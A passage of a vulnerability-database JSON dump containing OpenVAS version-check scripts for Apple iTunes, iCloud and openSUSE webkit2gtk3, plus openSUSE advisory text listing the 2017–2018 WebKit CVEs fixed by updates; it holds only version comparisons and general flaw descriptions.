not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:itunes\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813513\");\n script_version(\"2019-07-05T09:12:25+0000\");\n script_cve_id(\"CVE-2018-4224\", \"CVE-2018-4225\", \"CVE-2018-4226\", \"CVE-2018-4232\",\n \"CVE-2018-4192\", \"CVE-2018-4214\", \"CVE-2018-4204\", \"CVE-2018-4246\",\n \"CVE-2018-4200\", \"CVE-2018-4188\", \"CVE-2018-4201\", \"CVE-2018-4218\",\n \"CVE-2018-4233\", \"CVE-2018-4199\", \"CVE-2018-4190\", \"CVE-2018-4222\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 09:12:25 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-06-06 11:01:42 +0530 (Wed, 06 Jun 2018)\");\n script_name(\"Apple iTunes Security Updates(HT208852)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple iTunes\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An authorization issue in state management.\n\n - A permissions issue in the handling of web browser cookies.\n\n - A race condition issue in locking.\n\n - A memory corruption issue in input validation.\n\n - A type confusion issue in memory handling.\n\n - A memory corruption issue in state management.\n\n - An inconsistent user interface issue in state management.\n\n - Multiple memory corruption issues in memory handling.\n\n - A buffer overflow issue in memory handling.\n\n - An out-of-bounds read issue in input validation.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to read a persistent device identifier, modify the state of the\n Keychain, view sensitive user information, overwrite cookies, execute arbitrary\n code, crash Safari, spoof address bar and leak sensitive data.\");\n\n script_tag(name:\"affected\", value:\"Apple iTunes versions before 12.7.5\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple iTunes 12.7.5 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT208852\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_apple_itunes_detection_win_900123.nasl\");\n script_mandatory_keys(\"iTunes/Win/Ver\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nituneVer = infos['version'];\niPath = infos['location'];\n\nif(version_is_less(version:ituneVer, test_version:\"12.7.5\"))\n{\n report = report_fixed_ver(installed_version:ituneVer, fixed_version:\"12.7.5\", install_path:iPath);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-17T14:04:19", "description": "This host is installed with Apple iCloud\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2018-06-06T00:00:00", "type": "openvas", "title": "Apple iCloud Security Updates(HT208853)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4225", "CVE-2018-4188", "CVE-2018-4199", "CVE-2018-4224", "CVE-2018-4190", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4192", "CVE-2018-4204", "CVE-2018-4201", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4214", "CVE-2018-4232", "CVE-2018-4200", "CVE-2018-4226"], "modified": "2019-07-05T00:00:00", "id": "OPENVAS:1361412562310813514", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813514", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple iCloud Security Updates(HT208853)\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:icloud\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813514\");\n script_version(\"2019-07-05T09:12:25+0000\");\n script_cve_id(\"CVE-2018-4224\", \"CVE-2018-4225\", \"CVE-2018-4226\", \"CVE-2018-4232\",\n \"CVE-2018-4192\", \"CVE-2018-4214\", \"CVE-2018-4204\", \"CVE-2018-4246\",\n \"CVE-2018-4200\", \"CVE-2018-4201\", \"CVE-2018-4218\", \"CVE-2018-4233\",\n \"CVE-2018-4188\", \"CVE-2018-4190\", \"CVE-2018-4199\", \"CVE-2018-4222\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 09:12:25 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-06-06 11:24:10 +0530 (Wed, 06 Jun 2018)\");\n script_name(\"Apple iCloud Security Updates(HT208853)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple iCloud\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exists due to,\n\n - An authorization issue in state management.\n\n - A permissions issue in the handling of web browser cookies.\n\n - A race condition issue in locking.\n\n - A memory corruption issue in input validation.\n\n - A type confusion issue in memory handling.\n\n - A memory corruption issue in state management.\n\n - Multiple memory corruption issues in memory handling.\n\n - An inconsistent user interface issue in state management.\n\n - A buffer overflow issue in memory handling.\n\n - An out-of-bounds read issue in input validation.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to read a persistent device identifier, modify the state of the\n Keychain, view sensitive user information, overwrite cookies, execute arbitrary\n code, crash Safari, spoof address bar and leak sensitive data.\");\n\n script_tag(name:\"affected\", value:\"Apple iCloud versions before 7.5\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple iCloud 7.5 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT208853\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_apple_icloud_detect_win.nasl\");\n script_mandatory_keys(\"apple/icloud/Win/Ver\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nicVer = infos['version'];\niPath = infos['location'];\n\nif(version_is_less(version:icVer, test_version:\"7.5\"))\n{\n report = report_fixed_ver(installed_version:icVer, fixed_version:\"7.5\", install_path:iPath);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T17:39:17", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-10-26T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for webkit2gtk3 (openSUSE-SU-2018:3473-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4119", "CVE-2017-7161", "CVE-2018-4129", "CVE-2018-4165", "CVE-2018-4146", "CVE-2017-7165", "CVE-2018-4101", "CVE-2018-4128", "CVE-2018-4199", "CVE-2018-4163", "CVE-2018-12911", "CVE-2018-4120", "CVE-2018-4118", "CVE-2018-4114", "CVE-2018-4190", "CVE-2018-11646", "CVE-2018-11713", "CVE-2018-11712", "CVE-2018-4133", "CVE-2018-4162", "CVE-2017-7153", "CVE-2018-4125", "CVE-2017-7160", "CVE-2018-4233", "CVE-2018-4113", "CVE-2018-4222", "CVE-2017-13884", "CVE-2018-4127", "CVE-2018-4088", "CVE-2018-4204", "CVE-2018-4096", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4117", "CVE-2018-4161", "CVE-2017-13885", "CVE-2018-4232", "CVE-2018-4122", "CVE-2018-4200", "CVE-2018-4121"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310852089", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852089", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852089\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_cve_id(\"CVE-2017-13884\", \"CVE-2017-13885\", \"CVE-2017-7153\", \"CVE-2017-7160\", \"CVE-2017-7161\", \"CVE-2017-7165\", \"CVE-2018-11646\", \"CVE-2018-11712\", \"CVE-2018-11713\", \"CVE-2018-12911\", \"CVE-2018-4088\", \"CVE-2018-4096\", \"CVE-2018-4101\", \"CVE-2018-4113\", \"CVE-2018-4114\", \"CVE-2018-4117\", \"CVE-2018-4118\", \"CVE-2018-4119\", \"CVE-2018-4120\", \"CVE-2018-4121\", \"CVE-2018-4122\", \"CVE-2018-4125\", \"CVE-2018-4127\", \"CVE-2018-4128\", \"CVE-2018-4129\", \"CVE-2018-4133\", \"CVE-2018-4146\", \"CVE-2018-4161\", \"CVE-2018-4162\", \"CVE-2018-4163\", \"CVE-2018-4165\", \"CVE-2018-4190\", \"CVE-2018-4199\", \"CVE-2018-4200\", \"CVE-2018-4204\", \"CVE-2018-4218\", \"CVE-2018-4222\", \"CVE-2018-4232\", \"CVE-2018-4233\", \"CVE-2018-4246\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-10-26 06:43:57 +0200 (Fri, 26 Oct 2018)\");\n script_name(\"openSUSE: Security Advisory for webkit2gtk3 (openSUSE-SU-2018:3473-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.3\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:3473-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2018-10/msg00071.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkit2gtk3'\n package(s) announced via the openSUSE-SU-2018:3473-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for webkit2gtk3 to version 2.20.3 fixes the issues:\n\n The following security vulnerabilities were addressed:\n\n - CVE-2018-12911: Fixed an off-by-one error in xdg_mime_get_simple_globs\n (boo#1101999)\n\n - CVE-2017-13884: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1075775).\n\n - CVE-2017-13885: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1075775).\n\n - CVE-2017-7153: An unspecified issue allowed remote attackers to spoof\n user-interface information (about whether the entire content is derived\n from a valid TLS session) via a crafted web site that sends a 401\n Unauthorized redirect (bsc#1077535).\n\n - CVE-2017-7160: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1075775).\n\n - CVE-2017-7161: An unspecified issue allowed remote attackers to execute\n arbitrary code via special characters that trigger command injection\n (bsc#1075775, bsc#1077535).\n\n - CVE-2017-7165: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1075775).\n\n - CVE-2018-4088: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1075775).\n\n - CVE-2018-4096: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1075775).\n\n - CVE-2018-4200: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site that triggers a\n WebCore::jsElementScrollHeightGetter use-after-free (bsc#1092280).\n\n - CVE-2018-4204: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1092279).\n\n - CVE-2018-4101: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182).\n\n - CVE-2018-4113: An issue in the JavaScriptCore function in the 'WebKi ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n\n script_tag(name:\"affected\", value:\"webkit2gtk3 on openSUSE Leap 42.3.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18\", rpm:\"libjavascriptcoregtk-4_0-18~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-debuginfo\", rpm:\"libjavascriptcoregtk-4_0-18-debuginfo~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37\", rpm:\"libwebkit2gtk-4_0-37~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-debuginfo\", rpm:\"libwebkit2gtk-4_0-37-debuginfo~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-JavaScriptCore-4_0\", rpm:\"typelib-1_0-JavaScriptCore-4_0~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-WebKit2-4_0\", rpm:\"typelib-1_0-WebKit2-4_0~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-WebKit2WebExtension-4_0\", rpm:\"typelib-1_0-WebKit2WebExtension-4_0~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit-jsc-4\", rpm:\"webkit-jsc-4~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit-jsc-4-debuginfo\", rpm:\"webkit-jsc-4-debuginfo~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk-4_0-injected-bundles\", rpm:\"webkit2gtk-4_0-injected-bundles~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk-4_0-injected-bundles-debuginfo\", rpm:\"webkit2gtk-4_0-injected-bundles-debuginfo~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-debugsource\", rpm:\"webkit2gtk3-debugsource~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-devel\", rpm:\"webkit2gtk3-devel~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-plugin-process-gtk2\", rpm:\"webkit2gtk3-plugin-process-gtk2~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-plugin-process-gtk2-debuginfo\", rpm:\"webkit2gtk3-plugin-process-gtk2-debuginfo~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk3-lang\", rpm:\"libwebkit2gtk3-lang~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-32bit\", rpm:\"libjavascriptcoregtk-4_0-18-32bit~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-debuginfo-32bit\", rpm:\"libjavascriptcoregtk-4_0-18-debuginfo-32bit~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-32bit\", rpm:\"libwebkit2gtk-4_0-37-32bit~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-debuginfo-32bit\", rpm:\"libwebkit2gtk-4_0-37-debuginfo-32bit~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2021-06-08T18:43:18", "description": "This update for webkit2gtk3 to version 2.20.3 fixes the following issues:\n\n These security issues were fixed:\n\n - CVE-2018-4190: An unspecified issue allowed remote attackers to obtain\n sensitive credential information that is transmitted during a CSS\n mask-image fetch (bsc#1097693).\n - CVE-2018-4199: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (buffer overflow and\n application crash) via a crafted web site (bsc#1097693)\n - CVE-2018-4218: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site that triggers an\n @generatorState use-after-free (bsc#1097693)\n - CVE-2018-4222: An unspecified issue allowed remote attackers to execute\n arbitrary code via a crafted web site that leverages a\n getWasmBufferFromValue\n out-of-bounds read during WebAssembly compilation (bsc#1097693)\n - CVE-2018-4232: An unspecified issue allowed remote attackers to\n overwrite cookies via a crafted web site (bsc#1097693)\n - CVE-2018-4233: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1097693)\n - CVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL and\n webkitFaviconDatabaseSetIconURLForPageURL mishandle an unset pageURL,\n leading to an application crash (bsc#1095611).\n\n These non-security issues were fixed:\n\n - Disable Gigacage if mmap fails to allocate in Linux.\n - Add user agent quirk for paypal website.\n - Fix a network process crash when trying to get cookies of about:blank\n page.\n - Fix UI process crash when closing the window under Wayland.\n - Fix several crashes and rendering issues.\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n", "cvss3": {}, "published": "2018-08-10T03:08:49", "type": "suse", "title": "Security update for webkit2gtk3 (moderate)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2018-4199", "CVE-2018-4190", "CVE-2018-11646", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4218", "CVE-2018-4232"], "modified": "2018-08-10T03:08:49", "id": "OPENSUSE-SU-2018:2285-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-08/msg00031.html", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-06-08T18:43:18", "description": "This update for webkit2gtk3 to version 2.20.3 fixes the issues:\n\n The following security vulnerabilities were addressed:\n\n - CVE-2018-12911: Fixed an off-by-one error in xdg_mime_get_simple_globs\n (boo#1101999)\n - CVE-2017-13884: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1075775).\n - CVE-2017-13885: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1075775).\n - CVE-2017-7153: An unspecified issue allowed remote attackers to spoof\n user-interface information (about whether the entire content is derived\n from a valid TLS session) via a crafted web site that sends a 401\n Unauthorized redirect (bsc#1077535).\n - CVE-2017-7160: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1075775).\n - CVE-2017-7161: An unspecified issue allowed remote attackers to execute\n arbitrary code via special characters that trigger command injection\n (bsc#1075775, bsc#1077535).\n - CVE-2017-7165: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1075775).\n - CVE-2018-4088: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1075775).\n - CVE-2018-4096: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1075775).\n - CVE-2018-4200: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site that triggers a\n WebCore::jsElementScrollHeightGetter use-after-free (bsc#1092280).\n - CVE-2018-4204: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1092279).\n - CVE-2018-4101: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182).\n - CVE-2018-4113: An issue in the JavaScriptCore function in the &quot;WebKit&quot;\n component allowed attackers to trigger an assertion failure by\n leveraging improper array indexing (bsc#1088182)\n - CVE-2018-4114: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182)\n - CVE-2018-4117: An unspecified issue allowed remote attackers to bypass\n the Same Origin Policy and obtain sensitive information via a crafted\n web site (bsc#1088182, bsc#1102530).\n - CVE-2018-4118: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182)\n - CVE-2018-4119: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182)\n - CVE-2018-4120: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182).\n - CVE-2018-4121: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1092278).\n - CVE-2018-4122: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182).\n - CVE-2018-4125: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182).\n - CVE-2018-4127: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182).\n - CVE-2018-4128: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182).\n - CVE-2018-4129: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182).\n - CVE-2018-4146: An unspecified issue allowed attackers to cause a denial\n of service (memory corruption) via a crafted web site (bsc#1088182).\n - CVE-2018-4161: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182).\n - CVE-2018-4162: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182).\n - CVE-2018-4163: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182).\n - CVE-2018-4165: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182).\n - CVE-2018-4190: An unspecified issue allowed remote attackers to obtain\n sensitive credential information that is transmitted during a CSS\n mask-image fetch (bsc#1097693)\n - CVE-2018-4199: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (buffer overflow and\n application crash) via a crafted web site (bsc#1097693)\n - CVE-2018-4218: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site that triggers an\n @generatorState use-after-free (bsc#1097693)\n - CVE-2018-4222: An unspecified issue allowed remote attackers to execute\n arbitrary code via a crafted web site that leverages a\n getWasmBufferFromValue\n out-of-bounds read during WebAssembly compilation (bsc#1097693)\n - CVE-2018-4232: An unspecified issue allowed remote attackers to\n overwrite cookies via a crafted web site (bsc#1097693)\n - CVE-2018-4233: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1097693)\n - CVE-2018-4246: An unspecified issue allowed remote attackers to execute\n arbitrary code via a crafted web site that leverages type confusion\n (bsc#1104169)\n - CVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL and\n webkitFaviconDatabaseSetIconURLForPageURL mishandled an unset pageURL,\n leading to an application crash (bsc#1095611)\n - CVE-2018-4133: A Safari cross-site scripting (XSS) vulnerability allowed\n remote attackers to inject arbitrary web script or HTML via a crafted\n URL (bsc#1088182).\n - CVE-2018-11713: The libsoup network backend of WebKit unexpectedly\n failed to use system proxy settings for WebSocket connections. As a\n result, users could be deanonymized by crafted web sites via a WebSocket\n connection (bsc#1096060).\n - CVE-2018-11712: The libsoup network backend of WebKit failed to perform\n TLS certificate verification for WebSocket connections (bsc#1096061).\n\n\n This update for webkit2gtk3 fixes the following issues:\n\n - Fixed a crash when atk_object_ref_state_set is called on an AtkObject\n that's being destroyed (bsc#1088932).\n - Fixed crash when using Wayland with QXL/virtio (bsc#1079512)\n - Disable Gigacage if mmap fails to allocate in Linux.\n - Add user agent quirk for paypal website.\n - Properly detect compiler flags, needed libs, and fallbacks for usage of\n 64-bit atomic operations.\n - Fix a network process crash when trying to get cookies of about:blank\n page.\n - Fix UI process crash when closing the window under Wayland.\n - Fix several crashes and rendering issues.\n - Do TLS error checking on GTlsConnection::accept-certificate to finish\n the load earlier in case of errors.\n - Properly close the connection to the nested wayland compositor in the\n Web Process.\n - Avoid painting backing stores for zero-opacity layers.\n - Fix downloads started by context menu failing in some websites due to\n missing user agent HTTP header.\n - Fix video unpause when GStreamerGL is disabled.\n - Fix several GObject introspection annotations.\n - Update user agent quiks to fix Outlook.com and Chase.com.\n - Fix several crashes and rendering issues.\n - Improve error message when Gigacage cannot allocate virtual memory.\n - Add missing WebKitWebProcessEnumTypes.h to webkit-web-extension.h.\n - Improve web process memory monitor thresholds.\n - Fix a web process crash when the web view is created and destroyed\n quickly.\n - Fix a network process crash when load is cancelled while searching for\n stored HTTP auth credentials.\n - Fix the build when ENABLE_VIDEO, ENABLE_WEB_AUDIO and ENABLE_XSLT are\n disabled.\n - New API to retrieve and delete cookies with WebKitCookieManager.\n - New web process API to detect when form is submitted via JavaScript.\n - Several improvements and fixes in the touch/gestures support.\n - Support for the \u00e2\u0080\u009csystem\u00e2\u0080\u009d CSS font family.\n - Complex text rendering improvements and fixes.\n - More complete and spec compliant WebDriver implementation.\n - Ensure DNS prefetching 